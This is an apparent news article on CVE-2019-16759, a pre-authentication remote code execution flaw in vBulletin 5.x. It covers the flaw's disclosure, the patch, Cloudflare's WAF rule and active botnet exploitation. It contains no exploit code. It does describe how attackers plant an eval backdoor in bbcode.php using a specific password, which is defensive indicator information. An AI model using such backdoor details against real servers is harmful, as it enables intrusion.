Update: Six days after an anonymous researcher had disclosed a zero-day pre-auth remote code execution vulnerability in vBulletin, Cloudflare has deployed a new rule within their Cloudflare Specials Rulesets (ruleId: 100166).
The Cloudflare team states, “We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10. Protection against common RCE attacks is a standard feature of Cloudflare’s Managed Rulesets.”
Cloudflare customers with Managed Rulesets and Cloudflare Specials can be protected against this vulnerability by enabling the WAF Managed Rulesets in the Firewall tab of Cloudflare.
Head over to the Cloudflare blog for more details about Cloudflare’s protection against this vulnerability.
On September 23rd, an anonymous researcher published a zero-day pre-authentication remote code execution vulnerability in vBulletin, which allows an attacker to remotely execute malicious shell commands on any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability was disclosed on Full Disclosure, a public access mailing list. Yesterday, the vBulletin team issued a security patch for this vulnerability, which is now tracked under the CVE-2019-16759.
How does the zero-day vulnerability in vBulletin work
Ryan Seguin, a research engineer at Tenable explains in his blog that this vulnerability utilizes default vBulletin configurations. This enables an unauthenticated attacker to send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. He further states, “These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.”
Another security researcher, Troy Mursch of the Bad Packets security intelligence service told Arstechnica that the attackers are employing botnets to actively exploit vulnerable servers. The exploit, Mursch says, can modify the includes/vb5/frontend/controller/bbcode.php via the “sed” command to add a backdoor to the code.
Mursch adds, “This is done by setting a “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site. The vulnerability itself has been regarded by some as a backdoor.”
The vBulletin vulnerability is exploiting websites via the backdoor to build a list of bots that can configure supplementary ways of exploiting the infected hosts. The backdoor can infect the compromised hosts with DDoS malware and conduct denial-of-service attacks.
It is not known yet if the anonymous publisher of this vulnerability had reported the vulnerability to the vBulletin team or not. Another possibility is that the vBulletin team could not find a timely solution to this issue, encouraging the user to publish the vulnerability on Full Disclosure. The anonymous researcher has published about the zero-day vulnerability from an unnamed email service.
Why is a vulnerability in vBulletin so severe?
vBulletin, a popular web forum software package has around 0.1% market share of all the running forums across the internet. Though the percentage looks small, the vulnerability in vBulletin can impact billions of internet users, reports ZDNet. vBulletin is designed to collect user information about registered users. “While billions of internet sites don’t store any info about users, a handful of online forums could very easily store data on most internet users. Therefore, a market share of 0.1% is actually pretty significant, when we factor in how many users could be registered on these forums.”
Steam, EA, Zynga, NASA, Sony, BodyBuilding.com, the Houston Texans, and the Denver Broncos are some of the customers that use the vBulletin server.
Yesterday, GreyNoise, a cybersecurity company has tweeted that the vBulletin hackers are actively using this vulnerability to attack vulnerable forums.
GreyNoise is observing opportunistic exploitation of the recent vBulletin 5.x remote code execution vulnerability (CVE-2019-16759), starting three hours ago from several hundred devices around the Internet. Tags available now.
— GreyNoise Intelligence (@GreyNoiseIO) September 25, 2019
According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability is known for many years.
The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020. Easy to spot and exploit.
Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years
— Chaouki Bekrar (@cBekrar) September 25, 2019
The vBulletin team has already issued a patch for CVE-2019-16759 for vBulletin versions 5.5.2, 5.5.3, and 5.5.4. Users on earlier versions of vBulletin 5.x are advised to update to one of the supported versions in order to implement the patch. The vBulletin cloud version has already updated and fixed this issue.